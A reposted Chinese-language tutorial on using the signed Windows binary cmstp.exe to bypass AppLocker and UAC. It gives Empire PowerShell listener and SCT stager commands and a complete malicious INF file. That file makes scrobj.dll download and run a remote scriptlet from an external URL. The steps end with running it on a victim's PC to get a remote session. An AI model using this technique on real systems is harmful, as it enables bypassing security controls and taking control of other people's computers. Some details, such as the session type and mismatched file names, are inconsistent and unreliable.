使用cmstp繞過應用程序白名單


 

默認情況下,AppLocker允許在文件夾中執行二進制文件,這是可以繞過它的主要原因。已經發現,這樣的二進制文件可以很容易地用於繞過AppLocker和UAC。與Microsoft相關的二進制文件之一是CMSTP。CMSTP welcomes INF文件,因此通過INF進行開發是可能的。因此,我們將學習如何進行此類開發。

眾所周知,CMSTP接受SCT文件,然后無提示地運行,因此我們將創建一個惡意的SCT文件以實現我們的目標。為此,我們將使用Empire PowerShell。有關Empire PowerShell的詳細指南,請單擊此處

從Kali終端啟動Empire框架,然后輸入以下命令以創建惡意軟件:

listeners
uselistener http
set Host 192.168.1.109
execute

 

上面的命令將為您創建一個偵聽器,然后鍵入back以從偵聽器接口返回,並且創建SCT文件類型:

usestager windows/launcher_sct
set Listener HTTP
execute

運行上述漏洞將創建SCT文件。我們將使用以下腳本在PowerShell中執行文件。在此腳本中,給出SCT文件的路徑,並添加以下代碼,如圖所示:

這里下載此腳本

;cmstp.exe /s cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
 

 

現在,將文件發送到受害者的PC,並在受害者的命令提示符下運行以下命令:

cmstp.exe /s shell.inf

一旦運行該命令,您將獲得一個meterprer會話。使用以下命令訪問會話:

interact <session name>

這樣,您可以使用CMSTP二進制文件來繞過applocker限制。CMSTP需要一個INF文件,並且利用它可以幫助您訪問受害者的PC。

 
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM